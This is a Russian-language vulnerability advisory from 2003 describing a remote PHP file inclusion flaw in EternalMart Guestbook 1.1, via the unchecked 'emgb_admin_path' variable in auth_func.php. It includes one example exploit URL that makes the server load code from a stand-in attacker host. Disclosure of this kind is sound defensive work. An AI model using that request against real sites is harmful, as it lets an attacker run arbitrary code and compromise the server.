Выполнение произвольного PHP кода в EternalMart Guestbook

Дата публикации:
08.10.2003
Всего просмотров:
991
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
EternalMart Guestbook
Уязвимые версии: EternalMart Guestbook 1.1

Описание: Уязвимость обнаружена в EternalMart Guestbook. Злонамеренный пользователь может выполнить произвольный PHP код на системе.

Сценарий "auth_func.php" не проверяет местоположение PHP файла, включаемого в переменной "emgb_admin_path". В результате удаленный пользователь может заставить сервер включить и выполнить произвольный PHP код на системе с привилегиями Web сервера.

Пример/Эксплоит:

/admin/auth.php?emgb_admin_path=http://[evil_server]

URL производителя: http://www.eternalmart.com

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление можно найти на http://www.phpsecure.info.

Ссылки: EternalMart

или введите имя

CAPTCHA